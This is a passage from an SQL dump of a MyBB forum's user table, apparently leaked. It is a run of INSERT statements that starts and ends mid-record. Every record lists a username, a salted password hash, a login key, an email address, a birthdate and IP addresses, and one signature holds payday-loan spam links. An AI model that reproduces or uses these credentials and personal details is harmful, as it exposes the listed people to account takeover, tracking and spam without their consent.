'SOLyIalPOEVqkXeeFZq3P8v6AqRSH1eOLTxyrscZPZiwLZ2Rhf', 'galeradapulia@gmail.com', '0', '', '', '', '2', '', '0', '', '1351309115', '1351894585', '1351309473', '0', '', '0', '', '', '', '5-1-1988', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '186.244.220.47', '201.50.255.69', '-1158357969', '-919404731', '', '358', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('296', 'Artor', '0852e2f4d3dad29f5532e9346684cc77', 'd8Q3itQR', 'xKkgZufKaTsTQZQyfWE5oVLrEVpl3pSJtHfAod3lFPbdxygCPt', 'o2614372@rtrtr.com', '0', '', '', '', '2', '', '0', '', '1351342217', '1351343062', '1351342217', '0', '', '0', '', '', '', '18-11-1990', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '91.148.160.213', '91.148.160.213', '1536467157', '1536467157', '', '845', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('297', 'skumfuk', 'c73ea33d33ebf97ee5f96d835e118487', 'Ly9boxG5', 'q3ItNfOyqbv4SB2A4salAZlqh9YxblNBGMg7vu6SpzUBDILQOU', 'phuthuynho93@gmail.com', '0', '', '', '', '2', '', '0', '', '1351342530', '1352145936', '1352144754', '0', '', '0', '', '', '', '29-12-1993', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '113.23.6.183', '118.71.125.18', '1897334455', '1984396562', '', '780', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('298', 'amrindersingh', '3f7a4c3566d4a6ff474e906641766ba7', '9N9ouV8E', 'NGz64Eeuq3hhk17DbUJSlXe6VAwTAfqh4Miz6u5KmYRPoUnYpK', 'amit_gatewaysol@yahoo.co.uk', '0', '', '', '', '2', '', '0', '', '1351343949', '1351343949', '1351343949', '0', '', '0', '', '', '', '2-3-1975', 'all', '', '1', '0', '1', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '124.253.71.169', '', '2096973737', '0', '', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('299', 'COLENTE', 'dbaca1d5ffa50ebf3720e86f7655c047', 'ytmvXRgD', 'wwytWf24SZtfE6ZHlQSMwXCguzmQVAEXWMTFpcKU8no31KYf2U', 'edna_carson@yahoo.com', '0', '', '', '', '2', '', '0', '', '1351403535', '1351452752', '1351420688', '0', '', '0', '', '', '', '31-12-1980', 'all', '', '1', '0', '0', '1', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '69.132.1.54', '69.132.1.54', '1166278966', '1166278966', '', '87', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('300', 'e-w3b', 'fadd103d5c26c4921bfa76a05621f80a', 'HDWo7ScA', '2BMK5FxDSMZpI9mDPsTP2S8juH7yOtnst1MrNbxJiUwwYoszoQ', 'e_w3b@yahoo.com', '0', '', '', '', '2', '', '0', '', '1351459447', '1351460256', '1351459447', '0', '', '0', '', '', '', '4-9-1990', 'all', '', '1', '0', '0', '0', '1', '0', '1', '1', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '1', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '81.34.148.34', '81.34.148.34', '1361220642', '1361220642', '', '809', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('301', 'HiramH1956', 'adfa96b55933c063c91d682d581c2b2e', 'ZxXG7dyW', 'tM4jVJfWl8KtKeyMVqfXK2A4NDHNsczQHcJrXk17ipHxyvJ8QW', 'Janezdj8732@yahoo.com', '0', '', '', '', '2', '', '0', '', '1351460290', '1351702345', '1351460290', '0', 'http://ostatic.org/member/richardjoyner1942', '0', '', '', '', '19-3-1955', 'all', '[url=http://www.ooizit.com/members/aristotlemaxwell1936/]online payday loans direct lenders[/url] [url=http://www.extratasty.com/profile/59605/cameranleon1969]one hour payday loans no credit check[/url]', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '0', '129.121.100.27', '129.121.104.93', '-2122750949', '-2122749859', '', '6', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('303', 'kroker', 'bd9c58e9932e8dad9fe7f2f588ed8302', 'EZV9539g', '8sPAWvTNfvbjlvUZ9ELadAxDlosJK6DFh2qXCTPrN2PkSxD6Fv', '2012worldend@mail.com', '0', '', '', '', '2', '', '0', '', '1351528448', '1351528448', '1351528448', '0', '', '0', '', '', '', '1-1-1990', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '173.0.3.174', '', '-1392507986', '0', '', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('302', 'Mac Miller', 'cf03f9e3c3720beddb31613f67150e8c', 'QNFDD89A', 'KReKAzvaX5TlDRMzjOWzQTriKmlAS7oynAZyemf1c2EPJORWEt', 'ChesterTurner200@gmail.com', '23', './uploads/avatars/avatar_302.jpg?dateline=1351527693', '102|102', 'upload', '14', '', '0', '', '1351121391', '1351808164', '1351704922', '1351698117', '', '0', '', '', '', '4-7-1996', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-5', '0', '2', '', '', '0', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '0', '208.67.117.50', '74.240.167.148', '-800885454', '1257285524', '', '12798', '1', '5', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'a:1:{s:4:\"acid\";a:2:{i:27;a:5:{s:4:\"acid\";i:27;s:4:\"name\";s:5:\"Elite\";s:5:\"image\";s:58:\"inc/plugins/achivements/upload/custom_21_10_12_6_51_13.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:1;a:1:{s:11:\"showpostbit\";i:0;}}}', '0', '0'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('304', 'anonymous_sam', 'aa5e42fe6e7081b049eec99af10fa1e4', 'OzntfWxJ', '8ylU8Iar7Q7QDDlOaLaTw4w1fVHMWGg3nKzazS9nlfDQIZkBBH', 'sam.alsayed@hotmail.com', '1', '', '', '', '2', '', '0', '', '1351548696', '1351602535', '1351599335', '1351549369', '', '0', '', '', '', '27-7-1996', 'none', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '109.63.12.49', '109.63.12.49', '1832848433', '1832848433', '', '2065', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('305', 'sithgecko', 'a740bf21ae382f001d64577e5598e5cd', 'qHwsSRid', '4Sit6LTDYn6jpoGb6AJqtwi9N3cbIC9thYRs38GO3CN6gMqpE9', 'sithgecko@gmail.com', '0', '', '', '', '2', '', '0', '', '1351605801', '1351608870', '1351606198', '0', '', '0', '', '', '', '2-4-1970', 'all', '', '1', '1', '0', '0', '1', '0', '1', '1', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-6', '1', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '24.223.234.22', '24.223.234.22', '417327638', '417327638', '', '768', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('306', 'CommandoModz', '2cf5b19a139342acacc94dde09b39eeb', 'SYdbNI3I', '3ORqh6LOqDZaprRAmoEePS4r5DS1JcVwk4Kqod94w1BTRzu6oq', 'zacmalone16@live.com', '7', '', '', '', '2', '', '0', '', '1351612618', '1352771619', '1352164510', '1352771602', '', '0', '', '', '', '12-9-1997', 'all', '', '1', '1', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-5', '1', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '184.6.224.250', '184.6.224.250', '-1207508742', '-1207508742', '', '6821', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('307', 'dextr0pur', 'ec897e570522db5a63ce44c528a318ff', 'sudHVWMv', 'Z8GK3ceSRQuPa5UbJXJ485EJUIj45y9EQvWXD7yiuxnunp62s2', 'dextr0pur@mail.md', '0', '', '', '', '2', '', '0', '', '1351662517', '1351662543', '1351662517', '0', '', '0', '', '', '', '6-10-1984', 'all', '', '1', '1', '0', '1', '1', '0', '1', '1', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '1', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '228', '0', '0', '178.63.247.151', '178.63.247.151', '-1304430697', '-1304430697', '', '26', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('308', 'zagis19', '90cba145368f7f55211c9dfaedc27d3b', 'mpT4Y35z', '9nAi8ooxElPpQ8WSLXEDX8KkCDFXaKXSuij7fvDLcPDkx9NmDy', 'artax19@inbox.lv', '0', '', '', '', '2', '', '0', '', '1351732230', '1352330487', '1351734181', '0', '', '0', '', '', '', '9-3-1989', 'all', '', '1', '1', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '2', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '46.109.225.132', '46.109.225.132', '778953092', '778953092', '', '892', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('309', 'flawed', 'f6cdfce570b7bbd40fc28d249f98c589', 'VniMLOlU', 'CoVgLDQOUtTmAoR4SnMKb8l7VtWZZgh8aN45GbqiOxkSKdQTH2', 'gereksiz159@hotmail.com', '0', '', '', '', '2', '', '0', '', '1351779339', '1351780680', '1351779339', '0', '', '0', '', '', '', '19-3-1987', 'all', '', '1', '0', '1', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '95.10.175.178', '95.10.175.178', '1594535858', '1594535858', '', '1406', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('311', 'GreyPhantom', '5a62d5582a30743494d0f54b8772a858', '6PDEFvA8', 'GqR9gXPQxV3wuvYaNdm6Y4PaYrVygPbSmUpwf1fJVT2dt9LyC3', 